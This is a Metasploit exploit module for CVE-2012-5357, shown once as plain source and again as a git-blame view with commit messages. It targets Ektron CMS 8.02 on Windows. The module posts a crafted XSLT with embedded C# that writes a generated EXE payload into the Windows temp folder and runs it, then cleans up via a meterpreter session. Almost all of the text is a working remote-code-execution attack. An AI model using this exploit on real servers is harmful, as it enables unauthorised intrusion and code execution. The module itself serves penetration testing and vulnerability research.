metasploit-framework/modules/exploits/windows/http/ektron_xslt_exec.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'msf/core/exploit/file_dropper'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::EXE
	include Msf::Exploit::FileDropper

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Ektron 8.02 XSLT Transform Remote Code Execution',
			'Description'    => %q{
					This module exploits a vulnerability in Ektron CMS 8.02 (before SP5). The
				vulnerability exists due to the insecure usage of XslCompiledTransform, using a
				XSLT controlled by the user. The module has been tested successfully on Ektron CMS
				8.02 over Windows 2003 SP2, which allows to execute arbitrary code with NETWORK
				SERVICE privileges.
			},
			'Author'         => [
				'Rich Lundeen', # Vulnerability discovery
				'juan vazquez' # Metasploit module
			],
			'License'        => MSF_LICENSE,
			'References'     =>
				[
					[ 'CVE', '2012-5357'],
					[ 'URL', 'http://webstersprodigy.net/2012/10/25/cve-2012-5357cve-1012-5358-cool-ektron-xslt-rce-bugs/' ],
					[ 'URL', 'http://technet.microsoft.com/en-us/security/msvr/msvr12-016' ]
				],
			'Payload'        =>
				{
					'Space'           => 2048,
					'StackAdjustment' => -3500
				},
			'Platform'       => 'win',
			'Privileged'     => true,
			'Targets'        =>
				[
					['Windows 2003 SP2 / Ektron CMS400 8.02', { }],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Oct 16 2012'
		))

		register_options(
			[
				OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the VBS payload request', 60]),
				OptString.new('TARGETURI', [true, 'The URI path of the Ektron CMS', '/cms400min/'])
			], self.class )
	end

	def check

		fingerprint = rand_text_alpha(5 + rand(5))
		xslt_data = <<-XSLT
<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">
<msxsl:script language="C#" implements-prefix="user">
<![CDATA[
public string xml()
{
return "#{fingerprint}";
}
]]>
</msxsl:script>
<xsl:template match="/">
<xsl:value-of select="user:xml()"/>
</xsl:template>
</xsl:stylesheet>
		XSLT

		res = send_request_cgi(
			{
				'uri'     => "#{uri_path}WorkArea/ContentDesigner/ekajaxtransform.aspx",
				'version' => '1.1',
				'method'  => 'POST',
				'ctype'   => "application/x-www-form-urlencoded; charset=UTF-8",
				'headers' => {
					"Referer" => build_referer
				},
				'vars_post'    => {
					"xml" => rand_text_alpha(5 + rand(5)),
					"xslt" => xslt_data
				}
			})

		if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end


	def on_new_session(session)
		if session.type == "meterpreter"
			session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
		end

		@dropped_files.delete_if do |file|
			win_file = file.gsub("/", "\\\\")
			if session.type == "meterpreter"
				begin
					windir = session.fs.file.expand_path("%WINDIR%")
					win_file = "#{windir}\\Temp\\#{win_file}"
					# Meterpreter should do this automatically as part of
					# fs.file.rm().  Until that has been implemented, remove the
					# read-only flag with a command.
					session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
					session.fs.file.rm(win_file)
					print_good("Deleted #{file}")
					true
				rescue ::Rex::Post::Meterpreter::RequestError
					print_error("Failed to delete #{win_file}")
					false
				end

			end
		end

	end

	def uri_path
		uri_path = target_uri.path
		uri_path << "/" if uri_path[-1, 1] != "/"
		uri_path
	end

	def build_referer
		if datastore['SSL']
			schema = "https://"
		else
			schema = "http://"
		end

		referer = schema
		referer << rhost
		referer << ":#{rport}"
		referer << uri_path
		referer
	end

	def exploit

		print_status("Generating the EXE Payload and the XSLT...")
		exe_data = generate_payload_exe
		exe_string = Rex::Text.to_hex(exe_data)
		exename = rand_text_alpha(5 + rand(5))
		fingerprint = rand_text_alpha(5 + rand(5))
		xslt_data = <<-XSLT
<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">
<msxsl:script language="C#" implements-prefix="user">
<![CDATA[
public string xml()
{
char[] charData = "#{exe_string}".ToCharArray();
string fileName = @"C:\\windows\\temp\\#{exename}.txt";
System.IO.FileStream fs = new System.IO.FileStream(fileName, System.IO.FileMode.Create);
System.IO.BinaryWriter bw = new System.IO.BinaryWriter(fs);
for (int i = 0; i < charData.Length; i++)
{
	bw.Write( (byte) charData[i]);
}
bw.Close();
fs.Close();
System.Diagnostics.Process p = new System.Diagnostics.Process();
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.FileName = @"C:\\windows\\temp\\#{exename}.txt";
p.Start();
return "#{fingerprint}";
}
]]>
</msxsl:script>
<xsl:template match="/">
<xsl:value-of select="user:xml()"/>
</xsl:template>
</xsl:stylesheet>
		XSLT

		print_status("Trying to run the xslt transformation...")
		res = send_request_cgi(
			{
				'uri'     => "#{uri_path}WorkArea/ContentDesigner/ekajaxtransform.aspx",
				'version' => '1.1',
				'method'  => 'POST',
				'ctype'   => "application/x-www-form-urlencoded; charset=UTF-8",
				'headers' => {
					"Referer" => build_referer
				},
				'vars_post'    => {
					"xml" => rand_text_alpha(5 + rand(5)),
					"xslt" => xslt_data
				}
			})
		if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/
			print_good("Exploitation was successful")
			register_file_for_cleanup("#{exename}.txt")
		else
			fail_with(Exploit::Failure::Unknown, "There was an unexpected response to the xslt transformation request")
		end

	end
end
Added module for CVE-2012-5357 2012-12-03 19:12:02 +00:00			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
			`##`

			`require 'msf/core'`
			`require 'msf/core/exploit/file_dropper'`

			`class Metasploit3 < Msf::Exploit::Remote`
			`Rank = ExcellentRanking`

			`include Msf::Exploit::Remote::HttpClient`
			`include Msf::Exploit::EXE`
			`include Msf::Exploit::FileDropper`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Ektron 8.02 XSLT Transform Remote Code Execution',`
			`'Description' => %q{`
			`This module exploits a vulnerability in Ektron CMS 8.02 (before SP5). The`
			`vulnerability exists due to the insecure usage of XslCompiledTransform, using a`
			`XSLT controlled by the user. The module has been tested successfully on Ektron CMS`
			`8.02 over Windows 2003 SP2, which allows to execute arbitrary code with NETWORK`
			`SERVICE privileges.`
			`},`
			`'Author' => [`
Vuln discovered by Rich. See: https://twitter.com/webstersprodigy/status/277087755073380353 2012-12-07 16:42:45 +00:00			`'Rich Lundeen', # Vulnerability discovery`
Added module for CVE-2012-5357 2012-12-03 19:12:02 +00:00			`'juan vazquez' # Metasploit module`
			`],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`[ 'CVE', '2012-5357'],`
			`[ 'URL', 'http://webstersprodigy.net/2012/10/25/cve-2012-5357cve-1012-5358-cool-ektron-xslt-rce-bugs/' ],`
			`[ 'URL', 'http://technet.microsoft.com/en-us/security/msvr/msvr12-016' ]`
			`],`
			`'Payload' =>`
			`{`
			`'Space' => 2048,`
			`'StackAdjustment' => -3500`
			`},`
			`'Platform' => 'win',`
			`'Privileged' => true,`
			`'Targets' =>`
			`[`
			`['Windows 2003 SP2 / Ektron CMS400 8.02', { }],`
			`],`
			`'DefaultTarget' => 0,`
			`'DisclosureDate' => 'Oct 16 2012'`
			`))`

			`register_options(`
			`[`
			`OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the VBS payload request', 60]),`
			`OptString.new('TARGETURI', [true, 'The URI path of the Ektron CMS', '/cms400min/'])`
			`], self.class )`
			`end`

			`def check`

			`fingerprint = rand_text_alpha(5 + rand(5))`
			`xslt_data = <<-XSLT`
			`<?xml version='1.0'?>`
			`<xsl:stylesheet version="1.0"`
			`xmlns:xsl="http://www.w3.org/1999/XSL/Transform"`
			`xmlns:msxsl="urn:schemas-microsoft-com:xslt"`
			`xmlns:user="http://mycompany.com/mynamespace">`
			`<msxsl:script language="C#" implements-prefix="user">`
			`<![CDATA[`
			`public string xml()`
			`{`
			`return "#{fingerprint}";`
			`}`
			`]]>`
			`</msxsl:script>`
			`<xsl:template match="/">`
			`<xsl:value-of select="user:xml()"/>`
			`</xsl:template>`
			`</xsl:stylesheet>`
			`XSLT`

			`res = send_request_cgi(`
			`{`
			`'uri' => "#{uri_path}WorkArea/ContentDesigner/ekajaxtransform.aspx",`
			`'version' => '1.1',`
			`'method' => 'POST',`
			`'ctype' => "application/x-www-form-urlencoded; charset=UTF-8",`
			`'headers' => {`
			`"Referer" => build_referer`
			`},`
			`'vars_post' => {`
			`"xml" => rand_text_alpha(5 + rand(5)),`
			`"xslt" => xslt_data`
			`}`
			`})`

my editor... 2012-12-03 20:45:26 +00:00			`if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/`
Added module for CVE-2012-5357 2012-12-03 19:12:02 +00:00			`return Exploit::CheckCode::Vulnerable`
			`end`
			`return Exploit::CheckCode::Safe`
			`end`


			`def on_new_session(session)`
			`if session.type == "meterpreter"`
			`session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")`
			`end`

			`@dropped_files.delete_if do \|file\|`
			`win_file = file.gsub("/", "\\\\")`
			`if session.type == "meterpreter"`
			`begin`
			`windir = session.fs.file.expand_path("%WINDIR%")`
			`win_file = "#{windir}\\Temp\\#{win_file}"`
			`# Meterpreter should do this automatically as part of`
			`# fs.file.rm(). Until that has been implemented, remove the`
			`# read-only flag with a command.`
			`session.shell_command_token(%Q\|attrib.exe -r "#{win_file}"\|)`
			`session.fs.file.rm(win_file)`
			`print_good("Deleted #{file}")`
			`true`
			`rescue ::Rex::Post::Meterpreter::RequestError`
			`print_error("Failed to delete #{win_file}")`
			`false`
			`end`

			`end`
			`end`

			`end`

			`def uri_path`
			`uri_path = target_uri.path`
			`uri_path << "/" if uri_path[-1, 1] != "/"`
			`uri_path`
			`end`

			`def build_referer`
			`if datastore['SSL']`
			`schema = "https://"`
			`else`
			`schema = "http://"`
			`end`

			`referer = schema`
			`referer << rhost`
			`referer << ":#{rport}"`
			`referer << uri_path`
			`referer`
			`end`

			`def exploit`

embeding payload on the c# script 2012-12-04 16:44:55 +00:00			`print_status("Generating the EXE Payload and the XSLT...")`
			`exe_data = generate_payload_exe`
			`exe_string = Rex::Text.to_hex(exe_data)`
			`exename = rand_text_alpha(5 + rand(5))`
Added module for CVE-2012-5357 2012-12-03 19:12:02 +00:00			`fingerprint = rand_text_alpha(5 + rand(5))`
			`xslt_data = <<-XSLT`
			`<?xml version='1.0'?>`
			`<xsl:stylesheet version="1.0"`
			`xmlns:xsl="http://www.w3.org/1999/XSL/Transform"`
			`xmlns:msxsl="urn:schemas-microsoft-com:xslt"`
			`xmlns:user="http://mycompany.com/mynamespace">`
			`<msxsl:script language="C#" implements-prefix="user">`
			`<![CDATA[`
			`public string xml()`
			`{`
embeding payload on the c# script 2012-12-04 16:44:55 +00:00			`char[] charData = "#{exe_string}".ToCharArray();`
			`string fileName = @"C:\\windows\\temp\\#{exename}.txt";`
			`System.IO.FileStream fs = new System.IO.FileStream(fileName, System.IO.FileMode.Create);`
			`System.IO.BinaryWriter bw = new System.IO.BinaryWriter(fs);`
			`for (int i = 0; i < charData.Length; i++)`
			`{`
			`bw.Write( (byte) charData[i]);`
			`}`
			`bw.Close();`
			`fs.Close();`
Added module for CVE-2012-5357 2012-12-03 19:12:02 +00:00			`System.Diagnostics.Process p = new System.Diagnostics.Process();`
			`p.StartInfo.UseShellExecute = false;`
			`p.StartInfo.RedirectStandardOutput = true;`
embeding payload on the c# script 2012-12-04 16:44:55 +00:00			`p.StartInfo.FileName = @"C:\\windows\\temp\\#{exename}.txt";`
Added module for CVE-2012-5357 2012-12-03 19:12:02 +00:00			`p.Start();`
			`return "#{fingerprint}";`
			`}`
			`]]>`
			`</msxsl:script>`
			`<xsl:template match="/">`
			`<xsl:value-of select="user:xml()"/>`
			`</xsl:template>`
			`</xsl:stylesheet>`
			`XSLT`

			`print_status("Trying to run the xslt transformation...")`
			`res = send_request_cgi(`
			`{`
			`'uri' => "#{uri_path}WorkArea/ContentDesigner/ekajaxtransform.aspx",`
			`'version' => '1.1',`
			`'method' => 'POST',`
			`'ctype' => "application/x-www-form-urlencoded; charset=UTF-8",`
			`'headers' => {`
			`"Referer" => build_referer`
			`},`
			`'vars_post' => {`
			`"xml" => rand_text_alpha(5 + rand(5)),`
			`"xslt" => xslt_data`
embeding payload on the c# script 2012-12-04 16:44:55 +00:00			`}`
Added module for CVE-2012-5357 2012-12-03 19:12:02 +00:00			`})`
			`if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/`
			`print_good("Exploitation was successful")`
embeding payload on the c# script 2012-12-04 16:44:55 +00:00			`register_file_for_cleanup("#{exename}.txt")`
Added module for CVE-2012-5357 2012-12-03 19:12:02 +00:00			`else`
			`fail_with(Exploit::Failure::Unknown, "There was an unexpected response to the xslt transformation request")`
			`end`

			`end`
			`end`